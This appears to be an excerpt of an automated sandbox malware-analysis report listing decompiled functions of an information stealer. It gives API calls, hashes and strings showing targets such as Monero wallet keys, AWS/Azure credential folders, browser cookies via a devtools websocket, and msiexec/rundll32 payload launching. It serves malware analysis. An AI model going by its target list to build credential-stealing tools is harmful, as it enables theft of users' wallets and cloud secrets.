                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: b376decbe9558025b8aa081fc6fe64cfd59b087414a0986e673ee6ba0a5b973c
                              • Instruction ID: 19958c5cc161a1bbc88f34c370ecc8b1114337b98bc916f519d4fddb8cb82fdf
                              • Opcode Fuzzy Hash: b376decbe9558025b8aa081fc6fe64cfd59b087414a0986e673ee6ba0a5b973c
                              • Instruction Fuzzy Hash: 5B12EB71920118ABCB15EBA1DCA5FEEB379BF14704F00419FB10662291EF783B59CB69
                              Function 004CCFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004D8CF0: GetSystemTime.KERNEL32(004E0E1B,012AA480,004E05B6,?,?,004C13F9,?,0000001A,004E0E1B,00000000,?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004D8D16
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004CD083
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004CD1C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 004CD1CE
                              • lstrcat.KERNEL32(?,00000000), ref: 004CD308
                              • lstrcat.KERNEL32(?,004E1570), ref: 004CD317
                              • lstrcat.KERNEL32(?,00000000), ref: 004CD32A
                              • lstrcat.KERNEL32(?,004E1574), ref: 004CD339
                              • lstrcat.KERNEL32(?,00000000), ref: 004CD34C
                              • lstrcat.KERNEL32(?,004E1578), ref: 004CD35B
                              • lstrcat.KERNEL32(?,00000000), ref: 004CD36E
                              • lstrcat.KERNEL32(?,004E157C), ref: 004CD37D
                              • lstrcat.KERNEL32(?,00000000), ref: 004CD390
                              • lstrcat.KERNEL32(?,004E1580), ref: 004CD39F
                              • lstrcat.KERNEL32(?,00000000), ref: 004CD3B2
                              • lstrcat.KERNEL32(?,004E1584), ref: 004CD3C1
                              • lstrcat.KERNEL32(?,00000000), ref: 004CD3D4
                              • lstrcat.KERNEL32(?,004E1588), ref: 004CD3E3
                                • Part of subcall function 004DAB30: lstrlen.KERNEL32(004C4F55,?,?,004C4F55,004E0DDF), ref: 004DAB3B
                                • Part of subcall function 004DAB30: lstrcpy.KERNEL32(004E0DDF,00000000), ref: 004DAB95
                              • lstrlen.KERNEL32(?), ref: 004CD42A
                              • lstrlen.KERNEL32(?), ref: 004CD439
                                • Part of subcall function 004DAD80: StrCmpCA.SHLWAPI(00000000,004E1568,004CD2A2,004E1568,00000000), ref: 004DAD9F
                              • DeleteFileA.KERNEL32(00000000), ref: 004CD4B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: dc339b826942fbfbd29c588c3811503035e12f261adcf5f3b90d86fcaffde684
                              • Instruction ID: 98dcc25c8f42026a71754b2419e1e24625a6b7f027acd7ae7bca4301c9945514
                              • Opcode Fuzzy Hash: dc339b826942fbfbd29c588c3811503035e12f261adcf5f3b90d86fcaffde684
                              • Instruction Fuzzy Hash: CCE17571920104ABCB08EBA1DD66EEE7379BF14305F10455FF106762A1DE38BA19CB6D
                              Function 004CCA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,012ACF90,00000000,?,004E1544,00000000,?,?), ref: 004CCB6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 004CCB89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 004CCB95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 004CCBA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004CCBD9
                              • StrStrA.SHLWAPI(?,012ACFD8,004E0B56), ref: 004CCBF7
                              • StrStrA.SHLWAPI(00000000,012ACFF0), ref: 004CCC1E
                              • StrStrA.SHLWAPI(?,012ADD60,00000000,?,004E1550,00000000,?,00000000,00000000,?,012A9248,00000000,?,004E154C,00000000,?), ref: 004CCDA2
                              • StrStrA.SHLWAPI(00000000,012ADC40), ref: 004CCDB9
                                • Part of subcall function 004CC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 004CC971
                                • Part of subcall function 004CC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 004CC97C
                              • StrStrA.SHLWAPI(?,012ADC40,00000000,?,004E1554,00000000,?,00000000,012A91D8), ref: 004CCE5A
                              • StrStrA.SHLWAPI(00000000,012A8FA8), ref: 004CCE71
                                • Part of subcall function 004CC920: lstrcat.KERNEL32(?,004E0B47), ref: 004CCA43
                                • Part of subcall function 004CC920: lstrcat.KERNEL32(?,004E0B4B), ref: 004CCA57
                                • Part of subcall function 004CC920: lstrcat.KERNEL32(?,004E0B4E), ref: 004CCA78
                              • lstrlen.KERNEL32(00000000), ref: 004CCF44
                              • CloseHandle.KERNEL32(00000000), ref: 004CCF9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 8de3e5700acf6bd604c26b3830d7cb842ae4f968fce8cbd261e854de8c56ab82
                              • Instruction ID: cf0a808ed7dc06148661c83b2c8877c8a26cdfebf167daa914157657a296f977
                              • Opcode Fuzzy Hash: 8de3e5700acf6bd604c26b3830d7cb842ae4f968fce8cbd261e854de8c56ab82
                              • Instruction Fuzzy Hash: 06E12F71910108ABCB04EBA5DCA5FEEB779AF54304F00415FF14663291EF387A5ACB69
                              Function 004D84B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • RegOpenKeyExA.ADVAPI32(00000000,012AB008,00000000,00020019,00000000,004E05BE), ref: 004D8534
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004D85B6
                              • wsprintfA.USER32 ref: 004D85E9
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 004D860B
                              • RegCloseKey.ADVAPI32(00000000), ref: 004D861C
                              • RegCloseKey.ADVAPI32(00000000), ref: 004D8629
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 33091f8ce33aeb6c4faf9d7896a6867311871432357b655e87df41e808b5d9b3
                              • Instruction ID: 68d11b89ee5f7bf598824392c86abd0e863765ad68658c4564e2c57840288540
                              • Opcode Fuzzy Hash: 33091f8ce33aeb6c4faf9d7896a6867311871432357b655e87df41e808b5d9b3
                              • Instruction Fuzzy Hash: CE810F71910118ABDB28DB54CDA5FEA77B8BF48704F1082DBE10966240DF786B85CFA8
                              Function 004D91A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004D91FC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: `dMF$`dMF$image/jpeg
                              • API String ID: 2244384528-344610199
                              • Opcode ID: 9e254eeca007167ba37f0f01a3bfd40cfe2bd320f60638097c4712ec957f719b
                              • Instruction ID: 88dc0c8deeb1131d7c4a26eb8ea41f69c7f8d04a937815c030814c06d7a45bb9
                              • Opcode Fuzzy Hash: 9e254eeca007167ba37f0f01a3bfd40cfe2bd320f60638097c4712ec957f719b
                              • Instruction Fuzzy Hash: 9071CB75A14208ABDB14DFE4DC99FEEB7B8BB48700F10850AF516A7290DB38E905CB64
                              Function 004D4FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004D8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 004D8F9B
                              • lstrcat.KERNEL32(?,00000000), ref: 004D5000
                              • lstrcat.KERNEL32(?,\.azure\), ref: 004D501D
                                • Part of subcall function 004D4B60: wsprintfA.USER32 ref: 004D4B7C
                                • Part of subcall function 004D4B60: FindFirstFileA.KERNEL32(?,?), ref: 004D4B93
                              • lstrcat.KERNEL32(?,00000000), ref: 004D508C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 004D50A9
                                • Part of subcall function 004D4B60: StrCmpCA.SHLWAPI(?,004E0FC4), ref: 004D4BC1
                                • Part of subcall function 004D4B60: StrCmpCA.SHLWAPI(?,004E0FC8), ref: 004D4BD7
                                • Part of subcall function 004D4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 004D4DCD
                                • Part of subcall function 004D4B60: FindClose.KERNEL32(000000FF), ref: 004D4DE2
                              • lstrcat.KERNEL32(?,00000000), ref: 004D5118
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 004D5135
                                • Part of subcall function 004D4B60: wsprintfA.USER32 ref: 004D4C00
                                • Part of subcall function 004D4B60: StrCmpCA.SHLWAPI(?,004E08D3), ref: 004D4C15
                                • Part of subcall function 004D4B60: wsprintfA.USER32 ref: 004D4C32
                                • Part of subcall function 004D4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 004D4C6E
                                • Part of subcall function 004D4B60: lstrcat.KERNEL32(?,012AE7A8), ref: 004D4C9A
                                • Part of subcall function 004D4B60: lstrcat.KERNEL32(?,004E0FE0), ref: 004D4CAC
                                • Part of subcall function 004D4B60: lstrcat.KERNEL32(?,?), ref: 004D4CC0
                                • Part of subcall function 004D4B60: lstrcat.KERNEL32(?,004E0FE4), ref: 004D4CD2
                                • Part of subcall function 004D4B60: lstrcat.KERNEL32(?,?), ref: 004D4CE6
                                • Part of subcall function 004D4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 004D4CFC
                                • Part of subcall function 004D4B60: DeleteFileA.KERNEL32(?), ref: 004D4D81
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 7b7e930c5500e2844eb3d2d168c7fda4dbca7a1d83f77eaa40397df158d46702
                              • Instruction ID: 38427725c45d62d72a40cc88b64cbdefb406a0fdf149f0c42bc2d3612097cc11
                              • Opcode Fuzzy Hash: 7b7e930c5500e2844eb3d2d168c7fda4dbca7a1d83f77eaa40397df158d46702
                              • Instruction Fuzzy Hash: 2E41147AA5020867DB50E771DC57FED33385B60709F00445BB289661C1EEFCA7C88B9A
                              Function 004D3080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004D3415
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004D35AD
                              • ShellExecuteEx.SHELL32(0000003C), ref: 004D373A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 3348a283c0d6717ac68fda4c9c9d7465db7b03cdedf053db44fdc110488aa000
                              • Instruction ID: c92fdb3a0e249ccd6ffeede7b7f053898dfb58c4626286a3a35317c68eeba205
                              • Opcode Fuzzy Hash: 3348a283c0d6717ac68fda4c9c9d7465db7b03cdedf053db44fdc110488aa000
                              • Instruction Fuzzy Hash: D71251719101089ACB14EBA1DDB6FEDB379AF14304F00419FF10666295EF782B5ACF6A
                              Function 004C9BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004C9A50: InternetOpenA.WININET(004E0AF6,00000001,00000000,00000000,00000000), ref: 004C9A6A
                              • lstrcat.KERNEL32(?,cookies), ref: 004C9CAF
                              • lstrcat.KERNEL32(?,004E12C4), ref: 004C9CC1
                              • lstrcat.KERNEL32(?,?), ref: 004C9CD5
                              • lstrcat.KERNEL32(?,004E12C8), ref: 004C9CE7
                              • lstrcat.KERNEL32(?,?), ref: 004C9CFB
                              • lstrcat.KERNEL32(?,.txt), ref: 004C9D0D
                              • lstrlen.KERNEL32(00000000), ref: 004C9D17
                              • lstrlen.KERNEL32(00000000), ref: 004C9D26
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                              • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                              • API String ID: 3174675846-3542011879
                              • Opcode ID: 89334d7e4a0fdc27f8bd82c160186ff182e72f3d8d2c61d76b09d7db675f2056
